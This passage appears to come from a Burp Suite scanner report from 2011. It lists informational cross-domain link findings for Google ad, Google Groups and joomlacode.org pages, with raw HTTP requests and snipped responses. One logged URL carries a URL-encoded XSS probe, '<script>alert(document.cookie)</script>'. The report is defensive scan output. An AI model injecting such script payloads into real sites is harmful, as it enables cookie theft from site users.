GET /pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home_leaderboard_iframe&width=728&height=90&rand=99954773672
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.68. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924672&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903072605&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903072701&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1582079438&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&eid=36813006&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=129&xpc=3dz1EGZpFY&p=http%3A//www.masjo.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.masjo.com/search/learn%252Btyping%252Bquick%252Band%252Beasy%252Bcracka074f%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec4a5acfda9b/page/419/x22%26hl%3Den%26client%3Dca-pub-1167317790835381%26adU%3DPhoenix.edu%26adT%3DUniversity%2Bof%2BPhoenix%25C2%25AE%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.CustomTyping.com%26adT%3DLearn%2Bto%2BType%2BOnline%26gl%3DUS&usg=AFQjCNFlIjiuoT6JxPLSveHug_RFaD2moQ

Request

GET /pagead/ads?client=ca-pub-1167317790835381&output=html&h=90&slotname=4186215650&w=728&lmt=1295924672&flash=10.1.103&url=http%3A%2F%2Fwww.masjo.com%2Fsearch%2Flearn%2Btyping%2Bquick%2Band%2Beasy%2Bcracka074f%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec4a5acfda9b%2Fpage%2F419%2Fx22&dt=1295903072605&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903072701&frm=0&adk=2067819403&ga_vid=1825936610.1295903073&ga_sid=1295903073&ga_hid=1582079438&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1139&bih=1012&eid=36813006&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=129&xpc=3dz1EGZpFY&p=http%3A//www.masjo.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.69. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4580112719386696&output=html&h=90&slotname=2469587526&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Ftweetmeme.com%2F&dt=1295907699384&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295907699412&frm=1&adk=3587140093&ga_vid=1600525813.1295907699&ga_sid=1295907699&ga_hid=33325925&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2529230422&eid=30143103&fu=0&ifi=1&dtd=39

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://tweetmeme.com/%26hl%3Den%26client%3Dca-pub-4580112719386696%26adU%3DCustomizedGirl.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGbOoZRaASFs_0z2XURgRuv_kgEfw

Request

Response

20.70. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916283&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600%2C8789264665&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=3&dtd=4&xpc=jbDpm4xTyb&p=http%3A//www.x64bitdownload.com

The response contains the following link to another domain:

http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html%26hl%3Den%26client%3Dca-pub-8179195001597106%26adU%3DChrome.Google.com/webstore%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGDyJXjBicaux7pjfzULNTZbHz4kg

Request

GET /pagead/ads?client=ca-pub-8179195001597106&output=html&h=250&slotname=8789264665&w=250&lmt=1295902516&flash=10.1.103&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&dt=1295880916283&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0011327600%2C8789264665&correlator=1295880916252&frm=0&adk=3608328539&ga_vid=456036966.1295880916&ga_sid=1295880916&ga_hid=300189884&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=3&dtd=4&xpc=jbDpm4xTyb&p=http%3A//www.x64bitdownload.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

20.71. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The page was loaded from a URL containing a query string:

http://groups.google.com/groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.72. http://groups.google.com/grphp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/grphp

Issue detail

The page was loaded from a URL containing a query string:

http://groups.google.com/grphp?hl=en&tab=wg

The response contains the following links to other domains:

http://www.google-analytics.com/urchin.js
http://www.youtube.com/?hl=en&tab=g1

Request

GET /grphp?hl=en&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.73. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp;usg=AFQjCNFj-GEcBxmH6Kn-9FQXRDtCJ2gzsQ\

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://feeds.joomla.org/JoomlaSecurityNews
http://forum.joomla.org/
http://gforge.org/projects/as-help
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://help.joomla.org/
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/
https://gforge.com/gf/project/eclipse/
https://gforge.com/gf/project/msproject/
https://gforge.com/gf/project/office-addin/
https://gforge.com/gf/project/soapsdk/
https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp;usg=AFQjCNFj-GEcBxmH6Kn-9FQXRDtCJ2gzsQ\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum & Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp;usg=AFQjCNENvGO0Zh4Fx2-kY4zH0OvaUTL2wg\

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://feeds.joomla.org/JoomlaSecurityNews
http://forum.joomla.org/
http://gforge.org/projects/as-help
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://help.joomla.org/
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/
https://gforge.com/gf/project/eclipse/
https://gforge.com/gf/project/msproject/
https://gforge.com/gf/project/office-addin/
https://gforge.com/gf/project/soapsdk/
https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp;usg=AFQjCNENvGO0Zh4Fx2-kY4zH0OvaUTL2wg\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:17:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum & Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.75. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNElSqdDFu0YodFAYblvLhKLtlX1gQ\

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://feeds.joomla.org/JoomlaSecurityNews
http://forum.joomla.org/
http://gforge.org/projects/as-help
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://help.joomla.org/
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/
https://gforge.com/gf/project/eclipse/
https://gforge.com/gf/project/msproject/
https://gforge.com/gf/project/office-addin/
https://gforge.com/gf/project/soapsdk/
https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNElSqdDFu0YodFAYblvLhKLtlX1gQ\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:19:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
...[SNIP]...
<li class="item153"><a href="http://www.joomla.org/about-joomla.html"><span>
...[SNIP]...
<li class="item123"><a href="http://community.joomla.org"><span>
...[SNIP]...
<li class="item124"><a href="http://forum.joomla.org"><span>
...[SNIP]...
<li class="item125"><a href="http://extensions.joomla.org"><span>
...[SNIP]...
<li class="item126"><a href="http://docs.joomla.org"><span>
...[SNIP]...
<li class="item127"><a href="http://developer.joomla.org"><span>
...[SNIP]...
<li class="item149"><a href="http://shop.joomla.org"><span>
...[SNIP]...
<div class="toplogo">
<a href="http://www.joomla.org/"><img src="http://joomlacode.org/themes/gforge5/images/joomla_logo.png" alt="Joomla!">
...[SNIP]...
:relative; top:0px;' onclick='SearchByIDMenu();' onmouseover='this.src="/themes/gforge5/images/purple_searchbyid_mouseover.gif";' onmouseout='this.src="/themes/gforge5/images/purple_searchbyid.gif";'/><a href="http://gforgegroup.com/es/help.php?section=" target="_blank" style='float:left; position:relative; top:0px;'><img title='Help' class='HelpMenu' id='helpIcon' src='/themes/gforge5/images/help_mouseOff.gif' style='float:left; position:relative; top:0px;' onmouseover='this.src="/themes/gforge5/images/help_mouseO
...[SNIP]...
<br />
For information on how to develop extensions for Joomla! you should check out the Joomla! Developer Network (JDN) at: <a href="http://developer.joomla.org">http://developer.joomla.org</a>. For end user help check out the help site at <a href="http://help.joomla.org">http://help.joomla.org</a> and the Joomla! Documentation Site at <a href="http://docs.joomla.org">http://docs.joomla.org</a>
...[SNIP]...
</strong> <a target="_blank" href="http://feeds.joomla.org/JoomlaSecurityNews">http://feeds.joomla.org/JoomlaSecurityNews</a>
...[SNIP]...
<div class="rochentop">
           <a href="http://www.rochenhost.com" target="_blank"><img src="http://joomlacode.org/themes/gforge5/images/rochen_logo_joomlacode.jpg" alt="Joomla Hosting by Rochen">
...[SNIP]...
<p><a href="http://gforge.org/projects/as-help">GForge Help Forum & Docs</a><br /><a href="https://gforge.com/gf/project/office-addin/">Office Add-in Project</a><br /><a href="https://gforge.com/gf/project/soapsdk/">SOAP SDK Project</a>
...[SNIP]...
<p><a href="https://gforge.com/gf/project/eclipse/">Eclipse Project</a><br /><a href="https://gforge.com/gf/project/msproject/">MS Project Plugin</a><br /><a href="https://gforge.com/gf/project/vsplugin/">Visual Studio Plugin</a>
...[SNIP]...
<div id="footerInfo">©2005-2008 <a href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved. <a href="http://www.rochenhost.com" target="_blank">Joomla Hosting</a> by Rochen Ltd.   
       <a href="http://www.joomla.org/accessibility-statement.html">Accessibility Statement</a>   
       <a href="http://www.joomla.org/privacy-policy.html">Privacy Policy</a>   
       <a href="http://gforgegroup.com/">Gforge</a>
...[SNIP]...

20.76. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Issue detail

The page was loaded from a URL containing a query string:

http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNE5ANxf7dYG1GZzutEtdsOHJv3QDA\

The response contains the following links to other domains:

http://community.joomla.org/
http://developer.joomla.org/
http://docs.joomla.org/
http://extensions.joomla.org/
http://feeds.joomla.org/JoomlaSecurityNews
http://forum.joomla.org/
http://gforge.org/projects/as-help
http://gforgegroup.com/
http://gforgegroup.com/es/help.php?section=
http://help.joomla.org/
http://partner.googleadservices.com/gampad/google_service.js
http://shop.joomla.org/
http://www.joomla.org/
http://www.joomla.org/about-joomla.html
http://www.joomla.org/accessibility-statement.html
http://www.joomla.org/privacy-policy.html
http://www.opensourcematters.org/
http://www.rochenhost.com/
https://gforge.com/gf/project/eclipse/
https://gforge.com/gf/project/msproject/
https://gforge.com/gf/project/office-addin/
https://gforge.com/gf/project/soapsdk/
https://gforge.com/gf/project/vsplugin/

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp;usg=AFQjCNE5ANxf7dYG1GZzutEtdsOHJv3QDA\ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<li class="item122"><a href="http://www.joomla.org/"><span>
